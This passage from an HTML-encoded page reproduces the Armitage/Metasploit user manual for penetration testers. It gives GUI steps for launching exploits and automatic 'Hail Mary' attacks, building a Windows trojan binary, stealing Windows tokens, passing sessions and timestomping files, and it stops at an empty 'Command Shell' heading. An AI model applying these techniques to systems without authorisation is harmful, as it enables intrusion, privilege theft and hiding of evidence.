&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Before you can attack, you must choose your weapon. Armitage makes this process easy. Use&amp;nbsp;Attacks&amp;nbsp;-&amp;gt;&amp;nbsp;Find Attacksto generate a custom Attack menu for each host.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;To exploit a host: right-click it, navigate to&amp;nbsp;Attack, and choose an exploit. To show the right attacks, make sure the operating system is set for the host.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;The&amp;nbsp;Attack&amp;nbsp;menu limits itself to exploits that meet a minimum exploit rank of&amp;nbsp;&lt;em&gt;great&lt;/em&gt;. Some useful exploits are ranked&lt;em&gt;good&lt;/em&gt;&amp;nbsp;and they won&#39;t show in the attack menu. You can launch these using the module browser.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Use&amp;nbsp;Armitage&amp;nbsp;-&amp;gt;&amp;nbsp;Set Exploit Rank&amp;nbsp;to change the minimum exploit rank.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Optionally, if you&#39;d like to see hosts that are vulnerable to a certain exploit, browse to the exploit in the module browser. Right-click the module. Select&amp;nbsp;Relevant Targets. Armitage will create a dynamic workspace that shows hosts that match the highlighted exploit. Highlight all of the hosts and double-click the exploit module to attack all of them at once.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;5.2 Which exploit?&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Learning which exploits to use and when comes with experience. Some exploits in Metasploit implement a check function. These check functions connect to a host and check if the exploit applies. Armitage can use these check functions to help you choose the right exploit when there are many options. For example, targets listening on port 80 will show several web application exploits after you use&amp;nbsp;Find Attacks. Click the&amp;nbsp;Check exploits...&amp;nbsp;menu to run the check command against each of these. Once all the checks are complete, press&amp;nbsp;Ctrl F&amp;nbsp;and search for&amp;nbsp;&lt;code&gt;vulnerable&lt;/code&gt;. This will lead you to the right exploit.&lt;/span&gt;&lt;/div&gt;
&lt;center style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;img alt=&quot;Checking for vulnerabilities&quot; border=&quot;0&quot; src=&quot;http://www.fastandeasyhacking.com/images/vulnerable.png&quot; /&gt;&lt;/span&gt;&lt;/center&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Clicking a host and selecting&amp;nbsp;Services&amp;nbsp;is another way to find an exploit. If you have Nmap scan results, look at the information field and guess which server software is in use. Use the module browser to search for any Metasploit modules related to that software. One module may help you find information required by another exploit. Apache Tomcat is an example of this. The&amp;nbsp;&lt;em&gt;tomcat_mgr_login&lt;/em&gt;&amp;nbsp;module will search for a username and password that you can use. Once you have this, you can launch the&amp;nbsp;&lt;em&gt;tomcat_mgr_deploy&lt;/em&gt;&amp;nbsp;exploit to get a shell on the host.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;5.3 Launching Exploits&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage uses this dialog to launch exploits:&lt;/span&gt;&lt;/div&gt;
&lt;center style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;img alt=&quot;Launch a Metasploit exploit from Armitage&quot; src=&quot;http://www.fastandeasyhacking.com/images/launchexploit.png&quot; /&gt;&lt;/span&gt;&lt;/center&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;The exploit launch dialog lets you configure options for a module and choose whether to use a reverse connect payload.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage presents options in a table. Double click the value to edit it. If an option requires a filename, double click the option to open up a file chooser dialog. You may also check&amp;nbsp;Show advanced options&amp;nbsp;to view and set advanced options.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;tip&quot; style=&quot;border: 1px dashed rgb(136, 136, 136); font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-bottom: 1em; margin-left: 4em; margin-right: 4em; padding: 1em 1em 15px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;If you see&amp;nbsp;&lt;em&gt;SOMETHING ✚&lt;/em&gt;&amp;nbsp;in a table, this means you can double-click that item to launch a dialog to help you configure its value. This convention applies to the module launcher and preferences dialogs.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;tip&quot; style=&quot;border: 1px dashed rgb(136, 136, 136); font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-bottom: 1em; margin-left: 4em; margin-right: 4em; padding: 1em 1em 15px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Some penetration testers organize their targets into text files to make them easier to track. Armitage can make use of these files too. Double-click&amp;nbsp;RHOST ✚&amp;nbsp;and select your targets file. The file must contain one IP address per line. This is an easy way to launch an attack or action against all of those hosts.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;For remote exploits, Armitage chooses your payload for you. Generally, Armitage will use Meterpreter for Windows targets and a command shell payload for UNIX targets.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Click&amp;nbsp;Launch&amp;nbsp;to run the exploit. If the exploit is successful, Armitage will make the host red and surround it with lightning bolts. Metasploit will also print a message to any open consoles.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;5.4 Automatic Exploitation&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;If manual exploitation fails, you have the hail mary option.&amp;nbsp;Attacks&amp;nbsp;-&amp;gt;&amp;nbsp;Hail Mary&amp;nbsp;launches this feature. Armitage&#39;s Hail Mary feature is a smart db_autopwn. It finds exploits relevant to your targets, filters the exploits using known information, and then sorts them into an optimal order.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;This feature won&#39;t find every possible shell, but it&#39;s a good option if you don&#39;t know what else to try.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;5.5 Client-side Exploits&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Through Armitage, you may use Metasploit&#39;s client-side exploits. A client-side attack is one that attacks an application and not a remote service. If you can&#39;t get a remote exploit to work, you&#39;ll have to use a client-side attack.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Use the module browser to find and launch client-side exploits. Search for&amp;nbsp;&lt;em&gt;fileformat&lt;/em&gt;&amp;nbsp;to find exploits that trigger when a user opens a malicious file. Search for&amp;nbsp;&lt;em&gt;browser&lt;/em&gt;&amp;nbsp;to find exploits that server browser attacks from a web server built into Metasploit.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;5.6 Client-side Exploits and Payloads&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;If you launch an individual client-side exploit, you have the option of customizing the payload that goes with it. Armitage picks sane defaults for you.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;tip&quot; style=&quot;border: 1px dashed rgb(136, 136, 136); font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-bottom: 1em; margin-left: 4em; margin-right: 4em; padding: 1em 1em 15px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;In a penetration test, it&#39;s usually easy to get someone to run your evil package. The hard part is to get past network devices that limit outgoing traffic. For these situations, it helps to know about meterpreter&#39;s payload communication options. There are payloads that speak HTTP, HTTPS, and even communicate to IPv6 hosts. These payloads give you options in a tough egress situation.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;To set the payload, double-click&amp;nbsp;PAYLOAD&amp;nbsp;in the option column of the module launcher. This will open a dialog asking you to choose a payload.&lt;/span&gt;&lt;/div&gt;
&lt;center style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;img alt=&quot;Configure Metasploit Payload&quot; src=&quot;http://www.fastandeasyhacking.com/images/configurepayload.png&quot; width=&quot;500&quot; /&gt;&lt;/span&gt;&lt;/center&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Highlight a payload and click&amp;nbsp;Select. Armitage will update the&amp;nbsp;PAYLOAD,&amp;nbsp;DisablePayloadHandler,&amp;nbsp;ExitOnSession,LHOST, and&amp;nbsp;LPORT&amp;nbsp;values for you. You&#39;re welcome to edit these values as you see fit.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;If you select the&amp;nbsp;&lt;em&gt;Start a handler for this payload&lt;/em&gt;&amp;nbsp;option, Armitage will set the payload options to launch a payload handler when the exploit launches. If you did not select this value, you&#39;re responsible for setting up a multi/handler for the payload.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;5.7 Payload Handlers&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;A payload handler is a server that runs in Metasploit. Its job is to wait for a payload to connect to your Metasploit and establish a session.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;To quickly start a payload handler, navigate to&amp;nbsp;Armitage&amp;nbsp;-&amp;gt;&amp;nbsp;Listeners. A bind listener attempts to connect to a payload listening for a connection. A reverse listener waits for the payload to connect back to you.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;You may set up shell listeners to receive connections from netcat.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Go to&amp;nbsp;View&amp;nbsp;-&amp;gt;&amp;nbsp;Jobs&amp;nbsp;to see which handlers are running.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;5.8 Generate a Payload&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Exploits are great, but don&#39;t ignore the simple stuff. If you can get a target to run a program, then all you need is an executable. Armitage can generate an executable from any of Metasploit&#39;s payloads. Choose a payload in the module browser, double click it, select the type of output, and set your options. Once you click launch, a save dialog will ask you where to save the file to.&lt;/span&gt;&lt;/div&gt;
&lt;center style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;img alt=&quot;Generate a Metasploit Payload&quot; border=&quot;0&quot; src=&quot;http://www.fastandeasyhacking.com/images/payload.png&quot; /&gt;&lt;/span&gt;&lt;/center&gt;
&lt;div class=&quot;tip&quot; style=&quot;border: 1px dashed rgb(136, 136, 136); font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-bottom: 1em; margin-left: 4em; margin-right: 4em; padding: 1em 1em 15px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;To create a Windows trojan binary, set the output type to&amp;nbsp;exe. Set the&amp;nbsp;Template&amp;nbsp;option to a Windows executable. Set&amp;nbsp;KeepTemplateWorking&amp;nbsp;if you&#39;d like the template executable to continue to work as normal. Make sure you test the resulting binary. Some template executables will not yield a working executable.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Remember, if you have a payload, it needs a handler. Use the&amp;nbsp;multi/handler&amp;nbsp;output type to create a handler that waits for the payload to connect. This option offers more flexibility and payload options than the&amp;nbsp;Armitage&amp;nbsp;-&amp;gt;&amp;nbsp;Listeners&amp;nbsp;menu.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;tip&quot; style=&quot;border: 1px dashed rgb(136, 136, 136); font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-bottom: 1em; margin-left: 4em; margin-right: 4em; padding: 1em 1em 15px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;If you plan to start a handler and then generate a payload, here&#39;s a tip that will save you some time. First, configure a multi/handler as described. Hold down&amp;nbsp;Shift&amp;nbsp;when you click&amp;nbsp;Launch. This will tell Armitage to keep the module launch dialog open. Once your handler is started, change the output type to the desired value, and click&amp;nbsp;Launch&amp;nbsp;again. This will generate the payload with the same values used to create the multi/handler.&lt;/span&gt;&lt;/div&gt;
&lt;h1 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 24px; line-height: 20px; margin: 0px auto; padding-bottom: 16px; text-shadow: rgb(51, 51, 51) 4px 4px 8px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;6. Post Exploitation&lt;/span&gt;&lt;/h1&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;6.1 Managing Sessions&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Armitage makes it easy to manage the meterpreter agent once you successfully exploit a host. Hosts running a meterpreter payload will have a&amp;nbsp;Meterpreter&amp;nbsp;&lt;em&gt;N&lt;/em&gt;&amp;nbsp;menu for each Meterpreter session.&lt;/span&gt;&lt;/div&gt;
&lt;center style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;img alt=&quot;Meterpreter Post Exploitation Options&quot; src=&quot;http://www.fastandeasyhacking.com/images/postexploitation.png&quot; /&gt;&lt;/span&gt;&lt;/center&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;If you have shell access to a host, you will see a&amp;nbsp;Shell&amp;nbsp;&lt;em&gt;N&lt;/em&gt;&amp;nbsp;menu for each shell session. Right click the host to access this menu. If you have a Windows shell session, you may go to&amp;nbsp;Shell&amp;nbsp;&lt;em&gt;N&lt;/em&gt;&amp;nbsp;-&amp;gt;&amp;nbsp;Meterpreter...&amp;nbsp;to upgrade the session to a Meterpreter session. If you have a UNIX shell, go to&amp;nbsp;Shell&amp;nbsp;&lt;em&gt;N&lt;/em&gt;&amp;nbsp;-&amp;gt;&amp;nbsp;Upload&amp;nbsp;to upload a file using the UNIX printf command.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;You may also press&amp;nbsp;Ctrl+I&amp;nbsp;to select a session to interact with.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;6.2 Privilege Escalation&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Some exploits result in administrative access to the host. Other times, you need to escalate privileges yourself. To do this, use the&amp;nbsp;Meterpreter&amp;nbsp;&lt;em&gt;N&lt;/em&gt;&amp;nbsp;-&amp;gt;&amp;nbsp;Access&amp;nbsp;-&amp;gt;&amp;nbsp;Escalate Privileges&amp;nbsp;menu. This will highlight the privilege escalation modules in the module browser.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Try the&amp;nbsp;getsystem&amp;nbsp;post module against Windows XP/2003 era hosts.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;6.3 Token Stealing&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Another privilege escalation option is token stealing. When a user logs onto a Windows host, a token is generated and acts like a temporary cookie to save the user the trouble of retyping their password when they try to access different resources. Tokens persist until a reboot. You may steal these tokens to assume the rights of that user.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;To see which tokens are available to you, go to&amp;nbsp;Meterpreter&amp;nbsp;&lt;em&gt;N&lt;/em&gt;&amp;nbsp;-&amp;gt;&amp;nbsp;Access&amp;nbsp;-&amp;gt;&amp;nbsp;Steal Token. Armitage will present a list of tokens to you. Click&amp;nbsp;Steal Token&amp;nbsp;to steal one.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;If you want to revert to your original token, press&amp;nbsp;Revert to Self. The&amp;nbsp;Get UID&amp;nbsp;button shows your current user id.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;6.4 Session Passing&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Once you exploit a host, duplicating your access should be a first priority.&amp;nbsp;Meterpreter&amp;nbsp;&lt;em&gt;N&lt;/em&gt;&amp;nbsp;-&amp;gt;&amp;nbsp;Access&amp;nbsp;-&amp;gt;&amp;nbsp;Pass Session&amp;nbsp;will inject meterpreter into memory and execute it for you. By default this option is configured to call back to Armitage&#39;s default Meterpreter listener. Just click&amp;nbsp;Launch.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;You may also use&amp;nbsp;Pass Session&amp;nbsp;to send meterpreter to a friend. Set&amp;nbsp;LPORT&amp;nbsp;and&amp;nbsp;LHOST&amp;nbsp;to the values of their Meterpreter multi/handler.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;If your friend uses Armitage, have them type&amp;nbsp;&lt;code&gt;set&lt;/code&gt;&amp;nbsp;in a Console tab and report the&amp;nbsp;LHOST&amp;nbsp;and&amp;nbsp;LPORT&amp;nbsp;values to you. These are the values for their default Meterpreter listener.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;6.5 File Browser&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Meterpreter gives you several options for exploring a host once you&#39;ve exploited it. One of them is the file browser. This tool will let you upload, download, and delete files. Visit&amp;nbsp;Meterpreter&amp;nbsp;&lt;em&gt;N&lt;/em&gt;&amp;nbsp;-&amp;gt;&amp;nbsp;Explore&amp;nbsp;-&amp;gt;&amp;nbsp;Browse Files&amp;nbsp;to access the File Browser.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;Right-click a file to download or delete it. If you want to delete a directory, make sure it&#39;s empty first.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;You may download entire folders or individual files. Go to&amp;nbsp;View&amp;nbsp;-&amp;gt;&amp;nbsp;Downloads&amp;nbsp;to access your downloaded files.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;If you have system privileges, you may modify the file timestamps using the File Browser. Right-click a file or directory and go to the&amp;nbsp;Timestomp&amp;nbsp;menu. This features works like a clipboard. Use&amp;nbsp;Get MACE Values&amp;nbsp;to capture the timestamps of the current file. Right-click another file and use&amp;nbsp;Set MACE Values&amp;nbsp;to update the timestamps of that file.&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 19px; line-height: 20px; margin: 0px auto; padding-bottom: 12px; text-shadow: rgb(51, 51, 51) 2px 2px 4px;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;6.6 Command Shell&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 16px; line-height: 20px; margin-left: auto; margin-right: auto; padding-bottom: 15px; padding-top: 5px;&quot;&gt;
